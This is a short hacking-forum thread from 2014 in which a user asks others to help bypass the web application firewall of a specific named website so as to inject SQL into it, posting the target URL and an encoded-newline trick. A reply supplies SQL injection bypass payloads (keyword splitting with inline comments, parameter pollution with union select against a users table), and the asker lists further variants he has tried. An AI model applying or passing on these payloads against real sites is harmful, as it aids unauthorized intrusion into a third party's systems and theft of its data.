EvilZone

Community => General discussion => Topic started by: p3ng on October 30, 2014, 10:11:16 AM

Title: passby WAF for help
Post by: p3ng on October 30, 2014, 10:11:16 AM

A website with boring WAF, can't be injection

anyone interested?
URL:
http://dikee.net/textview.asp?id=663%OA

add %OA can passby one

Title: Re: passby WAF for help
Post by: Nortcele on October 30, 2014, 12:29:09 PM

Is there a reason why?

Besides messing with China...

Title: Re: passby WAF for help
Post by: 2d8 on October 30, 2014, 01:06:09 PM

Most of WAFs are based on signatures, so there are plenty of ways to modify request and bypass them.
e.g.:

Code: [Select]

/?id=1+union+select+1,2,3/* => /?id=1+un/**/ion+sel/**/ect+1,2,3--
/?id=1;select+1,2,3+from+users+where+id=1-- => /?id=1;select+1&id=2,3+from+users+where+id=1--

Title: Re: passby WAF for help
Post by: p3ng on October 30, 2014, 01:18:20 PM

I had tried mang methods,the method u provied isn't available

such as /*!sElecT*/,